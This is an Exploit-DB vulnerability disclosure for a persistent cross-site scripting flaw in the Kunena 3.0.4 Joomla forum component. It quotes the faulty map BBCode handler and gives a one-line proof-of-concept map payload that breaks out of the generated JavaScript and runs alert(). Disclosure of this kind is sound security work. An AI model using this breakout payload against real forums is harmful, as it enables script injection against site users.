Joomla! Component Kunena 3.0.4 - Persistent Cross-Site Scripting

Author: Qoppa
type: webapps
platform: php
port: 80.0
date_added: 2014-03-27 
date_updated: 2014-03-29 
verified: 0 
codes: OSVDB-105095 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.compkg_kunena_v3.0.4_2013-12-22.zip

Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa

+++ Description

"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."

Kunena is written in PHP. Users can post a Google Map using the following BBCode
	[map]content[/map]

Kunena creates a JavaScript based on input, but doesn't decode it correctly.


+++ Analysis

Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)

1049	function DoMap($bbcode, $action, $name, $default, $params, $content) {
	...
1078	$document->addScriptDeclaration("
1079	// <![CDATA[
	...
1097	var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
	...
1112	// ]]>"
1113	);

Single quotes remain untouched in $content, so it's possible to break out of encapsulation.


+++ PoC Exploit

[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map]